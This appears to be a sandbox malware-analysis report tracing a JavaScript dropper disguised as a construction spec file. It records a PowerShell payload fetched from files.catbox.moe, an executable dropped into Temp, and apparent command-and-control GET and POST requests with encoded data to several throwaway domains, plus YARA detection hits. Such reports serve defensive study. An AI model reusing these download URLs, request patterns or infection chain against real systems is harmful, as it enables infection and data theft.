                Source: global trafficHTTP traffic detected: GET /et18ob.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /vhr7/?Cf=xxUlW2vX-dIPmnP0&CL=iaSfD1StI7hDT4qLPsiE2zQeJuTNjk7n7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4t0mW0LdNsZ/ysFr93T3fDTPWMGFwNTiC4gY= HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4+2MinMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7RzM6wNjAHWVIo4recboKbaao8YnR4NtOnxQ=&Cf=xxUlW2vX-dIPmnP0 HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /k566/?CL=RARW43WNMKajmHobqktuR6SSs++r69WXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe/M4SnSZZuBmldonFkNjvznFjfMe0yaUlTKw=&Cf=xxUlW2vX-dIPmnP0 HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /jgkl/?CL=hI+cEEoDMRK5HtHm8YVaI3XtV/YoH3Lo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpb+tzlxPeBCypiVc63m5lwzFSO9V29/TaR1k=&Cf=xxUlW2vX-dIPmnP0 HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                Source: global trafficDNS traffic detected: DNS query: www.l63339.xyz
                Source: global trafficDNS traffic detected: DNS query: www.seasay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tumbetgirislinki.fit
                Source: global trafficDNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: global trafficDNS traffic detected: DNS query: www.kjuw.party
                Source: unknownHTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 199Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 43 4c 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 66 44 47 63 47 35 6a 79 44 79 34 2f 70 4d 48 2b 78 35 79 53 6b 39 54 51 4d 65 6b 4c 6c 55 6e 56 77 3d 3d Data Ascii: CL=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1fDGcG5jyDy4/pMH+x5ySk9TQMekLlUnVw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:27:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCeIMMnqMMFFI%2BlwHSDajFErDmmz41QnOVNOx0rK50c%2BN2Bj0uSZzppBxMZZDtM6iiw%2Bn4WRvQkl8Y%2FWFcoMNgz7u0xgnmtfaj9mnEK9xKwVi8FOICtm5rqgv2a30bRapurIsfxvzT1W0Gk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a19988921a3c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1805&rtt_var=902&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:27:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WhtYQy34ypiJMud%2FYCMH6vF95b5ee32LJHcoUCkAQEcgZGdt7%2BfwwGBrD5Grarvce4dgE8K2FBpRSvK6FngvjqJOrpK%2BTxy7ye7ZIN0jA0JEr2kSNidopkX4DBKmPKDoDAFN5H20YmqlpZY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a1c958cc41d9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:27:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLdgrhHb6T8Szvn0ZyKW8HXjaj74W3YlDzrsb%2BWNnXlB1c4nvJOsiGqxjj1byMkH9cyfSbD4krFZIMDmtHieoW2Hp%2Fzme%2FiST0AATADv%2FS98h%2FB36kTrShaE8obun%2FL9kShq%2BOnwb74%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a1ed4f184337-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:28:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNXeA64Xn6B4eCVrWaxkSxKXt9N7f0YNybDLIkTUMlArGbuPJYkmTPy%2BSQx0zp1fEdc%2BiYQPnI%2FjQPW9lQROqf0CSd%2FNdf65jlDQdExMWfXSvYKrDo5tMCZTenq%2BHr2B3qvoac93ljo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a1fd3e0b72a1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:28:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrP%2FRNnnuUXY%2FsfBGEO8AuSUtmmm21xyeO7VUugTZcDpE3h2f6D9WU%2Br%2BtNY3XO%2B%2FNKW45glVtKhLsYTkJ1rB0JK28ZxqGtOpA0chqXqjoJZ%2BS8ybkybjD%2FOEDCcSkQ52p7lggBRu64%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a20d5a077d1e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=999&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10915&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:28:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MuKX9aDEknwnTvu%2B6ps3OXMeP2DMltFKFqPZgJ6yDgb8zjK3IDQpA6JPEASzLMgJrP5GfLmOmb%2BDnOzYzoZVHNHulLCAOuGE2OfqbsaQkVvNaoCWag8VQhfJj1PGXHTARdaqGKTMc14%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a21d39554264-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1718&rtt_var=859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=547&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 25 Feb 2025 06:28:11 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 25 Feb 2025 06:28:14 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 25 Feb 2025 06:28:16 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: runonce.exe, 00000009.00000002.2976180128.0000000005268000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003598000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCC52A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCADC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: xBjKgBCuI1jq.exe, 0000000A.00000002.2975394799.00000000029C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party
                Source: xBjKgBCuI1jq.exe, 0000000A.00000002.2975394799.00000000029C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party/e0jv/
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCADC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wscript.exe, 00000000.00000002.1801684145.0000023136B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.ca
                Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
                Source: wscript.exe, 00000000.00000003.1691274229.00000231386CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/e
                Source: wscript.exe, 00000000.00000003.1690479875.00000231386BA000.00000004.00000020.00020000.00000000.sdmp, Stormwater Works Drawings Spec.jsString found in binary or memory: https://files.catbox.moe/et18ob.ps1
                Source: wscript.exe, 00000000.00000003.1799104824.00000231369E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798911413.00000231369DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801563846.00000231369E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/et18ob.ps1)
                Source: wscript.exe, 00000000.00000003.1800210275.00000231388B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/et18ob.ps1D
                Source: wscript.exe, 00000000.00000003.1687859855.0000023138681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/et18ob.ps1g2
                Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/j
                Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: runonce.exe, 00000009.00000003.2392387019.0000000007657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCC52A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003406000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4
                Source: runonce.exe, 00000009.00000002.2976180128.0000000004F44000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003274000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2505034564.000000003A3C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/
                Source: runonce.exe, 00000009.00000002.2976180128.0000000004F44000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003274000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2505034564.000000003A3C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2975527650.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217495881.0000000001290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217981667.0000000001D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
